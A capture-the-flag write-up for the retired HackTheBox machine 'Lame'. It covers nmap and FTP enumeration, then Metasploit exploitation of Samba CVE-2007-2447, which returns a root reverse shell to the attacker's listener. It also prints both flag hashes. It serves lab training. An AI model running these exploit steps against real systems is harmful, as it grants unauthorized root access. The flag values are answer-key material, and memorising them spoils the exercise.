~/writeups.sh / hackthebox / lame

Lame

HackTheBox Easy Linux Retired
#linux #samba #smb #cve-2007-2447 #metasploit #ftp #anonymous-ftp #rce

TL;DR

# 1. Enumerate
nmap -sV -sC -oN nmap/initial <attack_ip>

# 2. Check Samba version — 3.0.20 is vulnerable
searchsploit samba 3.0.20

# 3. Fire the exploit in Metasploit
msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS <attack_ip>
set LHOST YOUR_IP
run

# 4. Already root — no privesc needed
whoami   # root

Given Info

Box description: Lame is an Easy Linux box and one of the first machines on HTB. It runs an outdated Samba version with a critical unauthenticated RCE vulnerability. No privilege escalation required — the exploit lands you directly as root.

Recommended modules:

  • Network Enumeration with Nmap
  • Vulnerability Assessment
  • Metasploit Framework basics

Where I Got Stuck

  • Blank shell panic — after the exploit fired the shell looked completely empty. Thought it had failed. It was actually live — just needed to type a command to confirm. Don’t assume a blank prompt means failure, try whoami first.
  • Port already in use — first exploit run failed with Rex::BindFailed because port 4444 was still in use from a prior attempt. Kill existing handlers or change LPORT before re-running.
  • FTP typo — typed “Annonymous” on first FTP login attempt. Got a 530. Worth noting: anonymous FTP login uses lowercase “anonymous” as both username and password (or blank password).

Enumeration

Nmap

nmap -sV -oN nmap/initial <attack_ip>

Results:

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X

nmap -sC -oN nmap/scripts <attack_ip>

Key findings from script scan:

  • Anonymous FTP login allowed — confirmed by -sC
  • Samba exact version identified as 3.0.20-Debian — this is critical
  • SMB message signing disabled
  • SMB2 negotiation failed — indicative of very old Samba

Exact Samba version is what makes this box. 3.X - 4.X from -sV alone isn’t enough — the -sC script scan pins it to 3.0.20-Debian which is the vulnerable version.

Port 21 — FTP (vsftpd 2.3.4)

ftp <attack_ip>
# Username: anonymous
# Password: (blank)

Connected successfully. Directory was completely empty — no files, no useful access.

Dead end. Moved on.

vsftpd 2.3.4 has its own known backdoor (CVE-2011-2523) worth checking on future boxes even if FTP looks empty. On Lame it’s a red herring.

Port 445 — Samba 3.0.20

searchsploit samba 3.0.20

Results:

Samba 3.0.20 < 3.0.25rc3 - Username Map Script RCE   unix/remote/16320.rb

.rb extension = Metasploit module. Knowing this saves time — you can load it directly in msfconsole without hunting for the path.

CVE-2007-2447 confirmed. The vulnerability allows an unauthenticated attacker to inject shell commands via a crafted username during SMB authentication.

Attack Plan

Option A: Manual exploit ✗ (skipped)

A manual Python exploit exists but Metasploit handles this cleanly and this is a straightforward known CVE. Manual approach covered in the Shocker writeup — used it there for the learning value.

Option B: Metasploit — usermap_script ✓

msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS <attack_ip>
set LHOST YOUR_IP
run

First attempt — failed:

Rex::BindFailed — Address already in use

Port 4444 was still bound from a previous session. Fix:

set LPORT 4445
run

Second attempt — success:

Command shell session 1 opened

Shell appeared blank. Typed whoami:

root

Direct root shell. No privilege escalation required.

Post Exploitation / Privilege Escalation

None required. The Samba exploit spawns a shell directly as root — uncommon and worth noting when it happens.

whoami
# root

cat /root/root.txt
cat /home/makis/user.txt

Flags

🚩 User Flag — click to reveal 9677bcdd2b51f3355e7c68fb5fedef22
🚩 Root Flag — click to reveal b78c9afc390a1f867e05b975460e4908

What I Learned

  • Blank shell ≠ dead shell — always type a command before assuming the exploit failed. A blank prompt after a shell opens is normal behaviour for some exploits.
  • -sC matters-sV gave 3.X - 4.X which is useless for exploit searching. -sC pinned the exact version. Always run both.
  • .rb in searchsploit = Metasploit module — saves time knowing which tool to reach for immediately.
  • Port conflicts — kill prior handlers or change LPORT before re-running any exploit. Rex::BindFailed is almost always a port conflict.
  • vsftpd 2.3.4 backdoor — this version has CVE-2011-2523, a known backdoor. On Lame it’s a dead end but worth remembering for future boxes.
  • Direct root is rare — most boxes require privesc. When you land as root immediately, double-check with whoami and id before assuming something went wrong.